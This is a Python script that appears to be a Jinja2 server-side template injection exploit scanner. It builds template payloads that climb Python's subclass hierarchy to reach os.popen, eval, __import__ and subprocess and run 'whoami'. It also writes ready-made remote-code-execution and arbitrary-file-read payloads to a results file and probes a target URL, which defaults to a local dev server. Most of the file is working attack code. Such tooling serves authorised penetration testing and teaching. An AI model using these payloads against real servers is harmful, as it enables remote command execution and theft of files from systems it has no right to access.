from flask import Flask, request
from jinja2 import Template
from threading import Thread
import requests
import os
# Base URL of the host under test and the query parameter the rendered
# template expression is appended to (a local Flask dev server by default).
site = "http://127.0.0.1:5000/waewe?404_url="
# Generated probe URLs, bucketed by the gadget name used in scan_list.
url_dict = {
"popen": [],
"eval": [],
"__import__": [],
"subprocess": [],
}
# Fixed payload lines (Python 2 and 3 variants) that __main__ writes to
# result.txt verbatim; they are never requested by check_active. The
# 'filename' literal in the two file-read entries is not substituted anywhere
# in this script.
currency_url = [
"通用payload_rce: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('whoami').read()\") }}{% endif %}{% endfor %}\n",
"通用payload_任意文件读取_utf8: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='utf-8').read() }}{% endif %}{% endfor %}\n",
"通用payload_任意文件读取_gbk: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='gbk').read() }}{% endif %}{% endfor %}\n"
]
# Per-gadget (attribute path, call suffix) pairs consumed by scan(): the path
# is eval'd on each locally enumerated class to test whether the gadget name
# is present in that namespace; the suffix is appended verbatim to the
# generated URL. Python 3 oriented; per the original author's note the
# __builtins__ forms also work on Python 2.
scan_list = {
"popen": ("__init__.__globals__", "['popen']('whoami').read()"),
"eval": ("__init__.__globals__['__builtins__']", "['eval'](\"__import__('os').popen('whoami').read()\")"),
"__import__": ("__init__.__globals__['__builtins__']", "['__import__']('os').system('whoami')"),
"subprocess": ("__init__.__globals__", "['subprocess'].check_output('whoami', shell=True).decode('gbk')"),
# "subprocess": ("__init__.__globals__", "['subprocess'].check_output('dir', shell=True).decode('utf8')"),
}
def scan():
    """Enumerate the subclasses of ``str``'s base in the LOCAL interpreter and
    record a probe URL for every class whose ``__init__.__globals__`` exposes
    one of the gadgets named in ``scan_list``.

    The subclass index ``num`` is the position in this process's own
    ``__subclasses__()`` list; it is not verified against the host under
    test. Results are appended to the module-level ``url_dict``; nothing is
    returned.
    """
    num = 0
    for item in "".__class__.__base__.__subclasses__():
        try:
            for ii in scan_list:
                # eval() runs on a constant attribute path from scan_list,
                # not on external input. It raises for classes whose
                # __init__ carries no __globals__.
                if ii in eval("item." + scan_list[ii][0]):
                    # %-formatting, so the leading "{{{}" is literal text:
                    # the URL carries a Jinja expression rooted at a dict
                    # literal, not a str.format placeholder.
                    url = "%s{{{}.__class__.__base__.__subclasses__()[%s].%s%s}}\n" % (
                        site,
                        num,
                        scan_list[ii][0],
                        scan_list[ii][1]
                    )
                    url_dict[ii].append(url)
            num += 1
        except:
            # Bare except: any failure (AttributeError, or presumably a
            # TypeError when __builtins__ is a module rather than a dict)
            # abandons the remaining gadget checks for this class but still
            # advances the index so it stays aligned with the subclass list.
            num += 1
def check_active(url, desc):
    """Request each URL in ``url`` and append those that did not answer with
    a 5xx status to ``result.txt``, prefixed with ``desc``.

    Any status below 500 (200, 403, 404, ...) counts as active, so the only
    signal used is whether the host produced a server-side error while
    rendering. Each call opens its own append-mode handle; ``__main__`` runs
    this from several threads at once, so lines for different gadgets may
    interleave. ``requests.get`` is called without a timeout and without
    exception handling, so a connection failure propagates out of the thread.
    """
    with open("result.txt", "a", encoding="utf-8") as f:
        for i in url:
            status_code = requests.get(i).status_code
            if not status_code >= 500:
                # ``i`` already ends in "\n" (built in scan()), hence no
                # separator is added here.
                f.write("利用" + desc + ": " + i)
if __name__ == '__main__':
    # Fill url_dict via scan(), reset result.txt, write the fixed payload
    # lines, then probe each gadget bucket on its own thread.
    print("开始构造.....")
    scan()
    if os.path.exists("result.txt"):
        os.remove("result.txt")
    with open("result.txt", "a", encoding="utf-8") as f:
        for i in currency_url:
            f.write(i)
    t_list = []
    for i in url_dict:
        # One thread per gadget; each thread walks its bucket sequentially
        # and appends hits to result.txt through its own file handle.
        t = Thread(target=check_active, args=(url_dict[i], i,))
        t.start()
        t_list.append(t)
    for t in t_list:
        t.join()
    # NOTE: list has no ``slice`` method, so this line raises AttributeError
    # after the threads have finished; the closing message below is never
    # printed, although result.txt has already been written by then.
    [1,2,3].slice(0,0)
    print("创建完成,请查看当前路径下的 result.txt 文件!!")